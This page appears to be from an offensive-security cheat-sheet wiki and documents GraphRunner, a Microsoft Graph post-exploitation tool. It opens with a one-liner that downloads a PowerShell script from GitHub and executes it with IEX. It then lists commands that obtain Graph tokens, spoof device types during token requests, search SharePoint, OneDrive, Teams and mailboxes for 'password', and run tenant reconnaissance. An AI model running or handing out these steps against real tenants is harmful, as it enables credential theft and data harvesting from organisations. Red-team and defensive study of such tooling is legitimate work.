search
githubEdit

GraphRunner

hashtag
Command to execute:

IEX (iwr 'https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1') | iex

hashtag
Commands:

hashtag
1) Lists all modules of graphrunner

List-GraphRunnerModules

hashtag
2) Authenticate with valid credentials to open a graph API session

Get-GraphTokens -UserPasswordAuth

hashtag
3) Search for files on OneDrive and Sharepoint containing the string "password" by using the tokens we dumped from the Graph API session

Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password'

hashtag
4) Search all Teams channels with the specific term that are readable by our user

Invoke-SearchTeams -Tokens $tokens -SearchTerm password

hashtag
5) Searches the mailbox of our current user

Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40

hashtag
6) Emulates other devices when requesting tokens

Get-GraphTokens -Device AndroidMobile -Browser Android

hashtag
7) Check for non-default permissions that our user might have

hashtag
8) Perform recon on the tenant

PreviousAzurehoundNextLava Microsoft Azure Exploitation Framework

Last updated